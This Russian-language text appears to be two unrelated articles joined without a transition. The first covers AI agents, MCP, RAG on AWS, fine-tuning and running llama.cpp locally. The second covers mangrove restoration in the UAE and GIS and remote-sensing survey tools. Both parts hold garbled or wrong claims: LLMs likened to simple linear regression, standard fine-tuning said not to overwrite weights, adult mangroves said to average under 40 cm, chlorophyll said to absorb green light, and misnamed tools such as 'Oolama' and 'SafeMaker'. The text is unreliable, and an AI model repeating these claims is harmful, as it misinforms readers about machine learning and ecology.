AI уже вышел за рамки генерации текста, и базовый UX подразумевает взаимодействие с системами. Современные агенты умеют ходить в интернет, читать документы, вызывать API, делать запросы к БД и координировать множество действий между инструментами и сервисами. От современных ИИ-агентов ожидается нечто большее, чем просто выдача одного ответа. В реальных системах агенты оценивают качество своих собственных результатов, находят ошибки самостоятельно и обучаются. Именно эта способность к рефлексии и адаптации отличает глубокие агентские системы от простых одноразовых взаимодействий языковых моделей по принципу один вопрос-один ответ. Один ответ это всегда неполнота рассуждения, отсутствие контекста, неясные инструкций и противоречивые ограничения. Вместо того, чтобы рассматривать сгенерированные результаты как окончательные, агент дополнительно проверяет результат вопросами:

• Соответствует ли этот результат намерениям пользователя?
• Есть ли логические несоответствия?
• Является ли ответ полным и хорошо структурированным?

Поэтому ответ генерируется долго, используется множество этапов проверки. Генерация и оценка это не одна и та же задача. Генератор фокусируется на создании первоначального ответа, а оценщик анализирует этот ответ на предмет правильности, ясности или соответствия намерениям пользователя. Как и у людей, оценщик не должен быть ограничен теми же предположениями, которые привели к первоначальному результату исполнителя. Нашел ошибку -> вернул -> модель дообучилась, и так по кругу.

Важно контролировать эти циклы обратной связи и переделок ответа. Бесконечные циклы пересмотра всегда плохо и дорого. Нужны четкие критерии оценки, дополнительные вопросы к пользователю, список стратегий исправления и явные точки принятия решений.

Хороший промпт описывает, как система должна действовать, какие инструменты использовать, какие шаги предпринять. Но чем сложнее задача, тем больше шанс ошибиться. Ситуацию спасает Model Context Protocol (MCP). MCP позволяет найти и использовать нужные действия в разных программах, получать доступ к внешним ресурсам и вернуть результаты. Например, спарсить сайт и создать на его основе макет в Figma, тогда будет использоваться Selenium URL loader. Думайте о MCP как о мостике для заранее оговоренного взаимодействия между моделями, инструментами и внешними системами. MCP забирает часть усилий по описанию действий от пользователя. Инструменты и ресурсы заранее забиты в сервера MCP, а не описываются в текстовых инструкциях. Если пользователь просит сводку недавних новостей, у нас уже заранее настроен newspaper3k для получения данных и Oolama + OpenAI API для локальной и сервисной генерации текстов. Модель сама решит, какую фичу использовать, а не пытается воссоздать поведение с помощью промптов от пользователя. MCP оборачивает модель в нечто пригодное для использования на реальных рабочих задачах.

На реальном примере, ваш Claude будет считаться MPC-клиентом, который через MCP-сервер запрашивает данные у внешнего инструмента. MCP-сервер может ходить в поиск или искать по файлу.

Можно рассматривать MCP как систему координации между интеллектом и исполнением. Модель фокусируется на понимании намерений, отвечая на вопрос «что от меня хочет пользователь»? MCP управляет обнаружением, проверкой и оркестрацией инструментов и доступных ресурсов. LLM сама по себе не может вызвать API, это делает MCP. MCP также помогает избежать фрагментации контекста. Контекстное окно это максимальное количество токенов, которое модель может обработать за один запрос.

Текущая реализация MCP перекладывает всю ответственность за безопасность на разработчика.

Но магии нету, кнопка «сделай хорошо» все еще не появилась. Вызов LLM лучше выполнять с использованием структурированных и детальных запросов, так обеспечивается предсказуемое и последовательное поведение. Четкие инструкции снижают вероятность неправильного использования, сжигания токенов и путаницы.

Токены это базовые единицы текста. Методы токенизации тоже могут отличаться, примеры популярных WordPiece, SentencePiece, BPE. Вы можете сами импортировать библиотеку nltk и получить токены из предложения: «What goes around comes around» превратится в «what», «goes», «around», «comes», «around», далее это станет 0 и 1 для ML. Как мы видим, LLM по факту очень схожи с простой линейной регрессией.

Основные компоненты MCP:

• Клиенты, которые управляют взаимодействиями пользователей, состоянием разговора и оркестрацией.
• Серверы, которые предоставляют инструменты и ресурсы в качестве обнаруживаемых возможностей. Обычно это сервер на основе HTTP, ведет себя как легкий бэкэнд, потому что сервер остается активным и принимает запросы по URL.
• Сообщения, которые передают намерение, контекст и результаты выполнения.
• Структуры для входящих и исходящих данных.

Именно такое деление помогает MCP избегать переплетения между моделями и логикой выполнения. Каждый компонент остается независимым, но при этом продолжает работать совместно через общий протокол (может быть как MCP, так и другие протоколы). Модели не гадают и не придумывают действия, они работают строго в рамках возможностей, определенных MCP. Это упрощает отладку систем, делает их развертывание более безопасным и обеспечивает более предсказуемое поведение.

Ресурсы это условно документы, файлы, любой структурированный контент. Все это доступно по URI. Так модель будет работать в рамках правил и ограничений, это позволяет легко дебажить ошибки. Поэтому важно, чтобы каждый инструмент мог тестироваться изолированно, и переиспользоваться. Только так возможно масштабирование системы.

Но есть несколько правил работы с ресурсами: обычно, бизнес хочет иметь моментальный доступ через LLM ко всей документации, накопленной за 30 лет так-себе-кодинга. И даже если мы технически можем выдать весь объем текста за раз по запросу, все равно мы должны избегать больших документов. Это помогает сохранить читаемость. Тут будет использоваться actor-critic архитектура с двумя моделями: одна выбирает инструмент, а вторая валидирует качество выбора через награду. Одна отвечает за правила, а другая за ценность для пользователя.

А если ошибки?

Со временем неминуемо усложнение архитектуры. Чем ИИ становится более сложным и взаимосвязанным, тем больше вероятность сбоев. И главный вопрос «как правильно восстановить работу после возникновения ошибок?», ведь у нас больше не предсказуемые CRUD-сервисы. Под восстановление после сбоев для AI-систем подразумевается обеспечение непрерывности работы системы и приемлемого качества результатов даже в случае выхода из строя отдельных компонентов. Вместо того, чтобы позволить сбою остановить работу всей системы, хорошо спроектированные системы продолжают работать. То есть, система должна быть устойчивой — продолжать работать даже при сбое некоторых компонентов. Не доступен GPT-5.4? Переключаемся на Gemini 2.5. Система может деградировать, но продолжать работать. Это лучше, чем полный отказ системы. В идеале, у вас должны быть альтернативные инструменты, модели и упрощенные логические пути. Само собой, бекапы. Не удается отловить и исправить проблему — выдаем только консервативные ответы, если модель начала ломаться на небезопасных или нарушающих политику ответы.

Дебаг состоит из проверки входных данных, далее тестируется работоспособность инструментов и API (доступность, задержки и целостности ответов).

Многоэтапные рассуждения

Одноэтапное рассуждение хорошо подходит для простых запросов, но быстро теряет эффективность, когда задачи включают в себя зависимости, промежуточные решения. В таких ситуациях агент должен отслеживать ход выполнения на всех этапах, а не сразу выдавать окончательный ответ. Это решается через многоэтапное рассуждение: где бьются сложные цели на более мелкие подзадачи, контекст отдельно сохраняется на промежуточных этапах, и меняется последовательность выполнения при неудачных предположениях. В случае неудач, валидация выступает в качестве механизма контроля в многоэтапных рабочих процессах. Так мы не копим ошибки с разных этапов, и не тратим токены на расчеты по заранее неверным данным.

Если агент должен решить очень сложную, долгоиграющую задачу, то шанс неудачи весьма высок. Одна из основных причин это неумение поставить приоритет под-задачам. Нужно иерархическое планирование для деления стратегии от реализации. А для концентрации на долгосрочной цели, полагаемся на временную абстракция и постоянную обратную связь от пользователя.

Мониторинг

Отслеживать работу агентов удобно с помощью LangSmith, умеет работать и с LangChain, и LangGraph, работает на runs. Альтернатива это Langfuse, но он больше на энтерпрайз, когда есть отдельная роль на разбор пайплайн обработки запросов. И да, у него классный дашборд. Langfuse позволяет решать проблемы с помощью tracing. Если проблема возникла из-за непредвиденных взаимодействий между процессами поиска, формирования запросов и выполнения модели, то Langfuse поможет. Но LangSmith также покажет последовательность событий от начала до конца с учетом контекста. Классические Prometheus и Datadog также никто не отменял. Но в целом, интерфейс Streamlit в роли панели мониторинга, конвейеры LangChain, хранилище векторов и трассировка LangSmith, объединенные в единый app.py — хорошее решение. Централизация упрощает отслеживание, отладку и анализ рабочих процессов. Итак, проблема обнаружена, дальше что?

При внедрении ИИ в большой компании, сбои API чаще всего возникают из-за некорректных входных данных или неожиданной структуры ответов, а не из-за ошибок самой модели. Это не новинка, и в LangServe есть Automatic schema inference, который сокращает количество сбоев до того, как запрос долетит до модели.

Для воспроизведения ошибки, используем контейнеризацию. Это дает изоляцию сервисов для предотвращения конфликтов зависимостей, воспроизводимые развертывания с использованием образов контейнеров с версиями, и прочие плюсы оркестрации контейнеров. К контейнеризованным компонентам можно отнести:

• API агентов: доступ к выполнению инструментов через LangServe или аналогичные фреймворки.
• Серверы MCP: предоставдяют стандартизированный доступ к инструментам и ресурсам с использованием серверно-клиентской модели MCP. Контейнеризация серверов MCP обеспечивает стабильную доступность инструментов во всех средах. Главное избегать жестко заданных путей к файлам.
• Мониторинг: логируют трассировки выполнения, оценки и метрики производительности с помощью LangSmith или аналогов.
• Вспомогательная инфраструктура: БД, векторные хранилища или просто файлы, к которым обращаются агенты.

Работа с данными

Итак, к нам прилетел PDF-файл и наша задача — сделать его доступным через LLM. Сначала PDF нужно будет разбить на чанки с уникальными UUID, и после ембеддингов, хранить в векторнуй базу данных. Текст должен переноситься по предложениям, либо chuck overlap для сохранения контекста между чанками. И RAG будет позволять переписываться с PDF-документом.

RAG это попросту LLM с доступом к базе знаний. Умеет в какой-то степени и уменьшить галлюцинации. Как и всегда, здесь данные это ключ к успеху: их качество, стабильность, бекапы, скорость доступа. Высокоуровневый процесс будет выглядеть так query > retrieve > generate. Для реализации RAG на AWS можно взять bedrock для llm > openSearch (доступ к векторной БД (S3) > lambda). Bedrock это амазоновский сервис для развертывания ИИ-агентов, и я обожаю их prompt management. Для RAG ключевое и самое критичное это загрузка файлов, критично предоставить качественный контент, который система будет обрабатывать и на который будет реагировать.

Помним про закон Амдала, переложенный на параллельные вычисления. Идея проста: прирост производительности достигает плато при увеличении количества потоков обработки, поскольку последовательные части задачи не поддаются параллелизации. Компиляция файла llama.cpp на 24-ядерном процессоре 48-потоковом процессоре AMD Threadripper показывает, что увеличение количества потоков с 12 до 48 значительно сокращает время компиляции, но превышение 48 потоков дает незначительное улучшение из-за узких ограничений I/O и последовательных зависимостей.

В рамках экосистемы амазона, в комплекте с Bedrock идет SafeMaker для обучения моделей, AWS App Studio, Amazon Q в роли готового AI-ассистента. Да даже если вдруг не хватает возможностей бесплатного Google Colab, то AWS SageMaker отличная альтернатива платному Google Colab. Если вы выбрали Bedrock, то скорее всего придете к архитектуре async/await в Rust и средой выполнения Tokio для параллельных вызовов API Bedrock.

В качестве векторной БД может служить Amazon OpenSearch Serverless. Он индексирует документы и выполняет поиск по семантическому сходству, а не по совпадению ключевых слов. В конвейере RAG на AWS документы из S3 разбиваются на фрагменты, встраиваются с помощью Amazon Titan или аналогичной модели, и сохраняются в векторном индексе, чтобы по запросам пользователей извлекался наиболее релевантный контент для синтеза с помощью LLM.

И после многочисленного упоминания компании Amazon, опытные умы задумались о цене вопроса. Контролировать цену важно. Слишком много данных это плохо для кошелька. Важно уметь кэшировать частотные query. Если нужно по шагам, то

• Берете Bedrock с S3 в качестве источника данных и OpenSearch Serverless в качестве векторного движка
• Имплементируете smart chunking для разделения документов на чанки, оптимизированные для поиска
• Используйте интервалы пакетной загрузки вместо непрерывных обновлений, если не требуется актуальность данных в режиме реального времени.
• И добавляете уровень кэширования для часто задаваемых запросов

Итак, разработку агента можно разбить на три части:

• подготовка данных: загрузка данных, препроцессинг и структурирование. Разбивка на чанки, эмбеддинг
• indexes: подготовка к успешному извлечению данных. Векторные хранилища, SQL, все это в ChromaDB, Pinecone, FAISS. Тип БД важен, так FAISS может хранить индекс и искать в GPU, что на порядки ускоряет поиск. А GraphRAG позволяет связывать информацию с контекстом и строить связи.
• retrievers: для поиска подходящего документа исходя из запроса. Гибридный поиск вытаскивает нужный документ. Может и удалять.

Задача, с которой вы столкнетесь много раз за эту жизнь: нужно сократить ежемесячные расходы на LLM, сохранив при этом качество ответов и обеспечив соблюдение нормативных требований по конфиденциальности данных. Для этого нужно посмотреть на текущие затраты на Bedrock с оплатой за каждый вызов и сравнить с альтернативами за фикспрайс. Скорее всего, понадобится перенести рабочие нагрузки с большим объемом данных и повышенными требованиями к конфиденциальности на локально развернутую платформу llama.cpp с квантованными моделями GGUF. Так мы избавимся как от оплаты за использование API, да и данные будут целее. Но в любом случае от Bedrock полностью отказаться не получится, если нужны огромные модели. На Canvas можно прототипировать, а MLOps будет отслеживать цены.

Fine-tuning

Готовые модели это хорошо, но обычно нужны свои. Мы можем взять заранее натренированные модели на больших данных и адаптировать под нашу небольшую задачу. Самое простое, это техника standard fine-tuning, попросту адаптация под наш датасет за счет обновления весов. Берем готовую модель и НЕ перезаписываем. Если у вас типовые задачи и большой датасет, то ваш выбор будет standard fine-tuning.

Второй вариант fine-tuning это low-rank adaptation (LoRa) — добавляем маленькие матрицы на определенные слои, при таком подходе требуется малое ко-во параметров (в районе 0.1% от оригинального набора параметров). По факту, это точечная корректировка модели, когда у нас мало вычислительных ресурсов. Годится даже на большие модели. Оригинальные веса не трогаются, а комбинируются с матрицами. Так можно сварганить модель под множество различных задач. Используем, когда мало ресурсов, многозадачность и хотим избежать катастрофичного забывания контекста. LoRa хороша для open-source, используется PEFT. Также, позволяет модели легко адаптироваться к новым задачам.

Третий вариант это Supervised fine-tuning (SFT) — модель с минимизацией функции потерь. Для задач с высокой точностью, и когда есть размеченный датасет.

Общий процесс выглядеть будет так: у нас должен быть датасет -> он подготавливается -> создается новый слой -> процесс обучения модели -> проверка и деплой модели. Особое внимание на file ID, это может быть очень дорогая ошибка. Если у вас специально обученный человек, то можно пойти по пути RLHF — обучение через обратную связь от людей.

На практике, данные для обучения хранятся в формате JSONL для OpenAI, и загружаются на сервера OpenAI. Создается задача на FineTuning. Посмотреть демо можно тут. Для работы с JSONL я предпочитаю jqlang.

Перед обучением модели, обязательно определите и настройте параметры обучения. Ключевые:

• Learning rate — если параметр высокий, то результат не устроит. Если слишком низкий, то обучение модели будет длиться вечно.
• Batch size — чем меньше, тем менее стабильная модель.
• Number of epochs — чем меньше, тем слабее будет обучение. Когда вы передаете параметр epochs = 5, это значит, что 5 раз пройдетесь по датасету.

LLAMA

Хотите установить себе модель локально? GGUF это решение для локальных моделей на LLAMA. Своего рода мостик. От него следует GGUF Conversion Pipeline, что является многоэтапным процессом преобразования модели из исходного формата Hugging Face в готовый к развертыванию однофайловый артефакт. После квантования получаем файл с 62 гигабайт до примерно 19 гигабайт с помощью llama-quantize, и если система тянет, то пользуемся в свое удовольствие.

Первым шагом скачиваем git clone https://github.com/ggerganov/llama.cpp.git,

cd ~/git/llama.cpp

python3 -c "
from huggingface_hub import hf_hub_download
print('Downloading Qwen 2.5 Coder 7B Q5_K_M (~5GB)...')
hf_hub_download(
    repo_id='Qwen/Qwen2.5-Coder-7B-Instruct-GGUF',
    filename='qwen2.5-coder-7b-instruct-q5_k_m.gguf',
    local_dir='.',
    local_dir_use_symlinks=False
)
print('Download complete!')
"

ls -lh ~/git/llama.cpp/*.gguf

И для GGUF:

uv run --with transformers --with torch --with sentencepiece \
  python convert_hf_to_gguf.py /actual/path/to/model
pip3 install --user transformers torch sentencepiece protobuf numpy

И финальный запуск модели локально:

cd ~/git/llama.cpp/build


./bin/llama-server \
  -m ../qwen2.5-coder-7b-instruct-q5_k_m.gguf \
  -c 8192 \
  -ngl 99 \
  --port 8082

Озеленение территории это важная часть комфортной городской среды. А озеленение береговой линии в тропических зонах еще и заметный вклад в экологию. Но просто раскидать семена не получится, для озеленения потребуется гораздо больше усилий. В данной статье разберем ключевые практики из мира GIS на примере восстановления мангровых лесов в тропических зонах.

Условия обитания

Существует множество видов мангровых деревьев, они отличаются по своей неприхотливости к условиям обитания. Для восстановления мангровых деревьев есть специальный термин EMR (ecological mangrove restoration). В ОАЭ мангровые деревья растут на плоских участках (максимум 1° наклон), иначе вода их смоет. Мангры должны хорошо омываться водой и находиться на поверхности не более 40% времени, остальное время под водой. После попадания зерна в песок, оно еще долго двигается, пока не найдет подходящее место для роста. Подходящее место это перемолотые кораллы и ракушки, такие очень маленькие камни, желательна примесь глины. Почва должна быть темная и губчатая, вода морская или солоноватая. «Почва» будет из себя представлять комбинацию песка, ила, глины, суглинка, создающее пористую массу, богатую органикой и хорошо проводящую воду. Качество почвы определяется по нейтральному pH и соленостью в диапазоне 32 – 78 ppt⁵. Тут поможет прибор рефрактометр. Вся эта субстанция получает полезные вещества от испарений, дождей и приливов. В камнях мангровые деревья не растут, как и на обычном песке. Мангры предпочитают приливно-отливные участки, в низинке. Так что, как только зерно нашло подходящее место, оно на 3-5 дней перестает движение и начинает прорастать. Если вокруг есть черная сера, то это скажется на направлении роста корней, т.к. в серу расти корни не будут и предпочтут расти над уровнем земли.

Мангровые деревья в ОАЭ отдают семена раз в год, где-то между апрелем и июнем. Даже если растения живут практически в зоне экватора, они все равно производят семена сезонно. Если дерево очень активно дает семена, то скорее всего оно находится в плохих условиях и таким образом пытается выжить. На данный момент, В ОАЭ выжило только Avicennia marina, или серое мангровое дерево, потому что способно жить в высоком уровне соли и высокой влажности. Но даже для столь устойчивого растения соленость воды не должна превышать 41 ppt, и температура воды в диапазоне 14-37 градусов. Если соль превышает 50 ppt, то листья уже не справятся с испарением солей.

Avicennia marina обзавелись секрецией соли через железы в листьях. Может вырасти до 8 метров, но в среднем взрослое дерево не превышает 40 см. При этом корни могут распространяться на несколько метров, тем самым охраняя семена от уплывания и держа дерево выше уровня воды даже во время сильных приливов. И семена могут находиться возле дерева в режиме ожидании до года, пока не наступят подходящие условия для роста. Чем более плотно к друг другу расположены деревья, тем меньше они произведут семян. Нужно быть уверенным, что у черенка достаточно высокая позиция относительно уровня прилива, иначе они утонут. Водные потоки позволяют зернышку найти новое место подальше от родителя.

Все это оценивается на этапе предварительных изысканий, которые проводятся до начала этапа планирования посевов. На этом этапе собираются необходимые данные об объекте, включая топографическую, геологическую и экологическую информацию.

Сбор семян для посевов не должен сказываться на естественном разрастании мангровых лесов и рекомендуется собирать 20% от общего числа. Если семена собраны сегодня, то завтра уже должны быть посеяны. В течении этого времени семена должны храниться в морской воде. Если семена должны храниться дольше, то требуется хорошо кондиционируемое помещение, морская вода, и отсутствие света.

Птички, которые любят жить в мангровых лесах: фламинго, рифовая и серая цапли, рачья ржанка. Еще обязательно заведутся крабы. Крабы позволяют деревьям получать больше кислорода за счет рытья норок, а еще они крошат листья. И иногда едят зерна, но это мелочи. Когда дерево под водой, оно не способно поглощать кислород, и крабы в этом помогают — в этом их ценность.

Выбираем территорию

Существуют следующие варианты восстановления лесов:

• Восстановление (restoration) — это восстановление плотности деревьев то состояния, которое было ранее. Важно понимать, почему изначально деревья были утеряны? И устранить причину. Что такое restoration вам не ответит ни один эколог, потому что у всех разные методологии.
• Реабилитация (rehabilitation) — своего рода оживление эко-системы, вдохнуть новую жизнь. Возможно, с изменением типов деревьев.
• Облесение (afforestation) — это создание леса с нуля, условно в грязевой отмели, где исторически никогда не росли мангровые деревья.
• Улучшение (enhancement) — это добавление новых деревьев в текущую эко-систему, для улучшения экологический условий.

Искусственное засеивание рекомендуется, только если эко-система сама не справляется с восстановлением, и где территория пригодна для долгосрочного роста и развития. Желательно использовать семена с деревьев, которые выросли на этой или ближайших территориях. И знать ответы на вопросы:

• Есть ли связь с другими эко-системами? Если да, то рядом здоровые или больные деревья?
• Есть ли рядом морская трава или солончками. Если да, это позволит увеличить сдерживание углерода.
• Насколько велика экологическая значимость?
• Насколько легко получить доступ к участку для мониторинга, засеивания, вовлечения людей?
• Насколько рост уровня океана повлияет на выживаемость деревьев?

Оценка может производиться на спутниковых снимках/снимков с дронов, но посетить участок лично также очень важно. Если со спутника видна низкая плотность деревьев, то увеличение плотности деревьев поможет увеличить хранение углерода. В чем и состоит ключевая цель.

Пост-наблюдение

Существует фреймворк Before-After-Control-Impact (BACI), который позволяет отследить и разделить результаты усилий человека по посадке новых мангровых лесов и естественное распространение деревьев. Проверки идут минимум каждые полгода в течении первых 2,5 лет, и далее через 5 и 10 лет. Если выявлены погибшие ростки по причинам, независящим от окружающей среды, то их требуется заменить. Это может произойти из-за некорректного метода посадки, изначально больного зерна, внезапного шторма.

Здоровым считается дерево, у которого листья зеленые и не покрыты ракушками, не более 10% листьев желтые. Если листвы мало — это тревожный знак, а если листва покусана, то еще хуже. Если листва отсутствует совсем, то дерево можно считать мертвым. Все это можно отслеживать с помощью инструментов MRV (Measurement, Reporting, Verification). И по результатам предпринимать дополнительные меры, такие как защита деревьев от слишком сильных приливов, пасущихся животных,

Из болезней, основную угрозу представляют грибки (Eutypella, Aspergillus, Rhizophus) и насекомые (мошки, амброзиевые листоеды).

Визуализация данных:

В мире визуализации данных существует множество «слоев», которые подсвечивают определенные аспекты мангровых лесов. Все перечисленные ниже слои привязаны к пространственным данным.

Но для начал немного терминологии. Пространственное разрешение (Spatial Resolution) означает способность датчика различать мелкие детали и объекты на изображении. Более высокое пространственное разрешение означает, что можно обнаруживать и различать более мелкие объекты. Спутниковый снимок записывается из видимого спектра от 0.3 µm до 0.9 µm. Спектральное разрешение относится к способности датчика различать различные длины волн света. Оно обозначает, насколько точно датчик может разделить электромагнитный спектр.

Многие слои полагаются на инфракрасный спектрум. Он лежит в диапазоне 0.7 µm до 100 µm, что в 100 раз больше видимого нам спектра. Диапазон между 3.0µm до 100 µm это термальный спектр, и он является в том числе теплом от земли. Но нам интересен диапазон волны между 1 mm до 1 m, именно в этом диапазоне работает дистанционное зондирование. То, что долетело до земли, может либо передаться дальше (например, при пролете через стекло), либо отразиться, либо поглотиться. Нам нужно отражение, но и оно бывает двух типов: зеркальное отражение и диффузный отблеск. Зеркальное отражение работает с гладкими поверхностями, диффузный отблеск же вынуждает фотон летать между разными углами маленького рельефа. Тут играет роль длина волны — песок может быть гладкой поверхностью для длинной волны, и совсем не гладкой для короткой.

Спутниковые изображения могут предоставить ценные данные, но им обычно не хватает уровня точности, необходимого для детального разбора на этапе реализации. Спутниковые изображения обычно имеют более низкое разрешение по сравнению с другими методами исследований.

NDVI — показывает здоровье растительности по спутниковым снимкам. Дает понимание здоровья по условно захардкоженному значению NDVI > 0.73, с поправками на каждый отдельный участок. Если же значение 0 &< 0.25, то это считай голая земля. Лист дерева зеленый, потому что активно поглощает красные и синие фотоны, а вот хлорофилл в себя впитывает весь зеленый спектр. Осенью в листьях уже мало хлорофилла, поэтому листья приобретают желтые и красные оттенки. NDVI со спутниковых снимки это ключевое, что есть в индустрии. А NDVI * NIR = NIRv.

NDMI, NBR, LST — покажут климат.

SAR — используется для выявления деградации почвы. В экологии термин «деградация» обычно обозначает антропогенное воздействие, приводящее к ухудшению структуры, функционирования или продуктивности экосистемы (например, вырубка лесов, фрагментация, пожары, строительство инфраструктуры, перевыпас скота). Такие природные процессы, как гибель растений в результате засухи, старение или массовая гибель, вызванная климатическими изменениями, являются нарушениями или проявлениями естественной динамики, а не деградацией в строгом экологическом смысле (хотя в наши дни они очень часто вызваны деятельностью человека).

GCC — зеленый канал / красный + зеленый + синий каналы. Зеленые отражения.

SAVI — вегетационный индекс. Смотрит на яркость почвы.

EVI — хорошо показывает био-массу. Нужен синий, красный и инфракрасный канал. Также, нужен снимок в формате RGBN.

MSAVI — аналог SAVI, но работает по каждому пикселю. Также использует красный канал и инфракрасный (NIR). Инфракрасное излучение используется в тепловом дистанционном зондировании для измерения температуры и излучательной способности.

NDRE — опять используется красный канал и инфракрасный (NIR). Хорошо показывает границы растений.

FVC — плотность растений. Подскажет биологическое разнообразие, деградацию почвы.

LIDAR (Light Detection and Ranging) использует лазерные импульсы для создания подробных 3D-карт поверхности, что позволяет точно рассчитывать объем объектов нерегулярной формы, таких как песчаные холмистые местности и прочие рельефы, характеризующимся холмами и долинами. Позволяет создать DTM. Для оценки склонов, годится куда лучше чем RGB или MSP.

Существуют портативные (рюкзачные) LiDAR, они могут одновременно собирать как изображения с камеры, так и данные LiDAR. Эти системы часто используются для таких задач, как картографирование местности в удаленных или труднодоступных районах, где традиционные наземные или воздушные платформы LiDAR могут быть непрактичны. LiDAR обеспечивает высокую точность съемки, быстро и точно фиксируя подробные 3D-данные. Тут надо не забывать про здравый смысл: на зонах с регулярными приливами и отливами не удастся делать сравнения. Ситуацию спасает батиметрический лидар. Или взрослые мангровые деревья «вспахивают» землю вокруг себя, и земля визуально не соответствует описанным в начале статьи критериям.

DEM представляет собой значения высоты поверхности Земли и таких объектов, как здания, растительность и другие сооружения. Он показывает высоту объектов на земле относительно базовой точки, например, уровня моря.

Технически, большая часть этих данных может быть получена через дистанционное зондирование, это любые способы узнать информацию про поверхность земли без прямого взаимодействия с ней. Требуется 7 ключевых компонентов: источник света или любой другой электромагнитной энергии, которая летит через атмосферу к поверхности земли. Далее энергия достигает поверхности, взаимодействует с ней (распространяется и/или отражается), что должно фиксироваться удаленным сенсором. Сенсор передает данные в хранилище, где идет анализ полученных данных, и получение инсайтов.

И самое визуально классное это создание подробных 3D-моделей и карт на основе фотографий. Основная цель фотограмметрии — создание точных и подробных 3D-моделей, карт и измерений объектов или местности с помощью перекрывающихся фотографий. Эта техника включает в себя анализ геометрии и пространственных отношений на фотографиях для получения точных измерений и создания трехмерных представлений сфотографированной сцены. И данные с ETS (Electronic Total Station) очень полезны.

Метрики:

• Seedling count per subplot
• % survived seedlings
• Height/canopy width of seedlings
• Health of seedlings (‘healthy’, ‘sick’, ‘dead’, ‘grazed’)

Сбор данных

Чтобы данные визуализировать, нужно эти данные для начала собрать. Самое классическое это пойти ножками в поля и собирать данные вручную. Ручная съемка относится к традиционным методам, основанным на использовании ручных инструментов и техник, которые, как правило, менее точны, чем современные автоматизированные и цифровые методы, используемые в геодезической съемке.

Но так как мы живем в мире вертолетов, дронов и спутников, посмотрим на более современные методы сбора данных. Первый это ортофотоснимок. Это аэрофотоснимок, который был геометрически скорректирован для получения единого масштаба. Эта корректировка устраняет влияние наклона камеры и рельефа местности, что позволяет измерять истинные расстояния непосредственно по изображению. Такое единообразие достигается посредством процесса орторектификации. прочего сбора данных.

Почти наверняка, вам доведется собирать данные с помощью самолетов и дронов. Они очень часто используются для съемки изображений высокого разрешения и сбора данных над определенными территориями, но, в отличие от наземных платформ, они обычно не применяются для непрерывного или долгосрочного мониторинга.

В агрокультурной индустрии, приняты следующие дроны:

• DJI – Mavic 3M, маленький и подойдет на территорию менее 100 гектар
• Wingtra – WingtraOne Gen II, вполне себе рабочая и во многом удобная пташка
• Quantum Systems – Trinity Pro
• Foxtech
• Либо альтернативые методы, например Phase One PAS PANA

При триангуляционной съемке площадь делится на хорошо сформированные треугольники, то есть треугольники, углы которых не слишком малы и не слишком велики, в идеале от 30° до 120°. Это обеспечивает более высокую точность и стабильность измерений.

Нивелирование — это традиционный метод геодезии, используемый для измерения перепадов высот и установления точных точек в строительных проектах. Геодезия включает в себя точное измерение расстояний, углов и высот для определения относительного положения точек на поверхности Земли. Соответственно, геодезическая съемка включает в себя измерение больших площадей земной поверхности с высокой точностью. Она учитывает кривизну Земли и использует сложное оборудование и техники для достижения более высокой степени точности по сравнению с другими типами съемки.

Георадар (GPR) — это геофизический метод, в котором для получения изображения подповерхностных слоев используются радиолокационные импульсы. Он обычно применяется для обнаружения подземных сооружений, в том числе водотоков, путем посылания электромагнитных импульсов в грунт и измерения отражений от подповерхностных объектов. Различия в свойствах материалов, например наличие воды, могут давать отчетливые отражения, которые помогают идентифицировать подземные водотоки. И другая тяжелая артиллерия это наземные платформы. Также известны под именем наземные метеостанции и станции мониторинга, и действительно используются для непрерывного мониторинга атмосферных явлений, таких как температура, влажность, давление воздуха и т. д. Они также используются для долгосрочного мониторинга наземных объектов, таких как изменения в землепользовании, рост растительности и условия окружающей среды. Эти платформы обеспечивают сбор локальных данных, часто в режиме реального времени, что делает их ценными для различных приложений мониторинга.

GNSS (Global Navigation Satellite System) — GNSS-приемники широко используются в современной геодезии для точного позиционирования, хотя исторически они не считаются традиционным оборудованием. Одним из ключевых преимуществ съемок с помощью GNSS является то, что они относительно независимы от условий окружающей среды. Приемники GNSS могут получать точные данные о местоположении в различных погодных условиях и на различных рельефах, что делает их универсальным инструментом для полевых съемок. Установка GNSS-приемников на штативах необходима для сбора данных с опорных станций, это не является основным фактором для эффективной работы сети CORS.

Есть нюансы, и много. Один их них это ионосферная погрешность. Возникает из-за влияния ионосферы на распространение сигналов GNSS, вызывая задержки и искажения. Хотя она может способствовать погрешностям позиционирования, обычно не является крупнейшим источником погрешностей. Все такие нюансы можно замерить и учитывать. Например, DOP означает «разбавление точности». Это термин, используемый в системах спутниковой навигации и GPS для количественной оценки влияния геометрии спутников на точность определения местоположения.

Необработанные данные GNSS хранятся в файлах RINEX (Receiver Independent Exchange Format) и используются для импорта в Trimble Business Center для последующей обработки. Файлы RINEX содержат необработанные данные спутниковых наблюдений, собранные приемниками GNSS, и совместимы с различным программным обеспечением для последующей обработки.

Радар (Radio Detection and Ranging) — используются для прогнозирование погоды. Радары могут обнаруживать осадки, облака, штормы и другие атмосферные явления путем передачи радиоволн и измерения отраженных сигналов. Эта информация имеет решающее значение для мониторинга погодных условий и прогнозирования экстремальных погодных явлений.

Нивелир это оптический прибор, используемый для измерения перепадов высот или возвышений. Несмотря на то, что он обеспечивает точные измерения, он, как правило, дешевле тахеометра.

Компас очень простые и недорогие геодезические инструменты, используемые для измерения направлений. Они не так совершенны и дороги, как тахеометры.

Теодолиты — это оптические приборы, используемые для измерения горизонтальных и вертикальных углов. Они точны и незаменимы при выполнении геодезических работ, при этом обычно стоят дешевле тахеометров, которые обладают дополнительными функциями, такими как измерение расстояний.

Тахеометры — это современные геодезические приборы, в которых объединены технологии электронного измерения расстояний (EDM) и функции теодолита. Они отличаются высокой точностью, прецизионностью и расширенными функциями, такими как запись и хранение данных, что делает их более дорогими по сравнению с более простыми приборами, такими как компасы, нивелиры или теодолиты.

Однолучевой эхолот. В мелководных прибрежных районах и реках для измерения глубины воды обычно используются однолучевые эхолоты. Этот метод заключается в излучении одного акустического импульса вниз с судна или платформы и измерении времени, необходимого импульсу для отражения от дна и возврата к датчику. Затем глубина рассчитывается на основе времени, затраченного импульсом на прохождение и возврат.

